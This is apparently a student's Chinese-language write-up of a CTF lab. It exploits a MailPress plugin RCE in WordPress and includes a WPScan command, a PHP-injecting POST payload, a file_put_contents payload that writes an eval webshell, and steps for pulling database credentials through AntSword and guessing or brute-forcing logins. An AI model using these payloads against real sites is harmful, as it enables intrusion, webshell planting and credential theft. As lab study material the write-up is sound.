在kali中使用火狐浏览器打开靶场192.168.7.200,看到题目。
访问题目给出的网址192.168.7.100。
在终端中使用WPScan扫描网址:
输入命令wpscan --url IP
然后扫描结果中显示Interesting Findings,仔细观察。
在这里我们主要对mailpress rce漏洞进行复现,找到flag。
步骤:
1.安装HackBar插件,浏览器右上角菜单-首选项-左下角扩展与主题-搜索,按F12/Fn+F12可使用插件.
2.调出插件,输入URL和要提交的数据,点击Execute执行,记住运行结果中的id。
http://漏洞环境ip:端口号/wp-content/plugins/mailpress/mp-includes/action.php
post:
action=autosave&id=0&revision=-1&toemail=&toname=&fromemail=&fromname=&to_list=1&Theme=&subject=<?php phpinfo();?>&html=&plaintext=&mail_format=standard&autosave=1
3.只输入URL,点击执行,查看执行结果,找到root路径。
http://漏洞环境ip:端口号/wp-content/plugins/mailpress/mp-includes/action.php?action=iview&id=上一步得到的ID
4.上传一句话木马,输入URL和要提交的数据,把前面的post数据中subject的数据改掉,改为一句话木马,点击Execute执行,出现下图执行成功。
<?php file_put_contents('C:/phpstudy123/WWW/eval.php','<?php @eval($_POST["c"]);?>');?>
5.打开蚁剑,右键添加数据,选中数据,右键-文件管理,打开配置文件,找到数据库相关信息。
6.连接数据库,选中数据,右键-数据操作,在配置列表中添加配置,输入之前数据库信息中的用户名和密码,添加,双击flag,执行SQL语句,出现flag2。
7.回到原网页登陆界面,登录的用户名和密码可以使用万能密码试试,可以暴力破解,也可以在蚁剑中输入数据库语句修改密码,进去之后就能看到一个flag,打开后预览就能得到flag1。
8.登陆进去后左边有一列目录,挨个仔细查看,它们有可能藏在你意想不到的地方,最后可以找到flag3和flag4。
9.flag5需要进行远程连接才能得到,但是我连不上,所以这里先记录一下,以后补充。
最后,因为老师开的靶场已经关闭了,所以我没有截到flag3和flag4的图,文章中的截图是热心肠的同学给的,感谢给我提供图片的同学,好人一生平安。